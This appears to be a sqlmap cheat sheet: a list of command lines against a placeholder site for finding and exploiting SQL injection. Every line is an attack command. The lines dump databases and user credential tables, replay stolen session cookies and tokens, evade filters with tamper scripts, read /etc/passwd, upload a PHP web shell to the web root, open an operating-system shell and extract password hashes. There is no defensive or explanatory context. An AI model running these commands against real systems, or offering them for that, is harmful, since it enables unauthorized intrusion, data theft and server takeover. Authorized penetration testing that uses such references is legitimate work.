SQLMap automates detection and exploitation of SQL injection vulnerabilities across all major databases.
sqlmap -u "http://target.com/page?id=1"
sqlmap -u "http://target.com/page?id=1" --dbs
sqlmap -u "http://target.com/page?id=1" -D dbname --tables
sqlmap -u "http://target.com/page?id=1" -D dbname -T users --columns
sqlmap -u "http://target.com/page?id=1" -D dbname -T users -C username,password --dump
sqlmap -u "http://target.com/page?id=1" --dump-all
sqlmap -u "http://target.com/login" --data="username=admin&password=pass"
sqlmap -r request.txt
sqlmap -u "http://target.com/login" --data="user=admin&pass=test" -p user
sqlmap -u "http://target.com/page" --cookie="PHPSESSID=abc123" --data="id=1"
sqlmap -u "http://target.com/page?id=1" --cookie="session=TOKEN"
sqlmap -u "http://target.com/page?id=1" -H "Authorization: Bearer TOKEN"
sqlmap -u "http://target.com/page?id=1" --auth-type=Basic --auth-cred="admin:password"
sqlmap -u "http://target.com/page?id=1" --technique=BEUST
sqlmap -u "http://target.com/page?id=1" --technique=T --time-sec=5
sqlmap -u "http://target.com/page?id=1" --tamper=space2comment
sqlmap -u "http://target.com/page?id=1" --tamper=between,randomcase,space2comment
sqlmap -u "http://target.com/page?id=1" --random-agent
sqlmap -u "http://target.com/page?id=1" --delay=1 --safe-freq=3
sqlmap -u "http://target.com/page?id=1" --proxy=http://127.0.0.1:8080
sqlmap -u "http://target.com/page?id=1" --level=5 --risk=3
sqlmap -u "http://target.com/page?id=1" --current-user --current-db --hostname
sqlmap -u "http://target.com/page?id=1" --is-dba
sqlmap -u "http://target.com/page?id=1" --file-read=/etc/passwd
sqlmap -u "http://target.com/page?id=1" --file-write=shell.php --file-dest=/var/www/html/shell.php
sqlmap -u "http://target.com/page?id=1" --os-shell
sqlmap -u "http://target.com/page?id=1" --os-cmd="whoami"
sqlmap -u "http://target.com/page?id=1" --passwords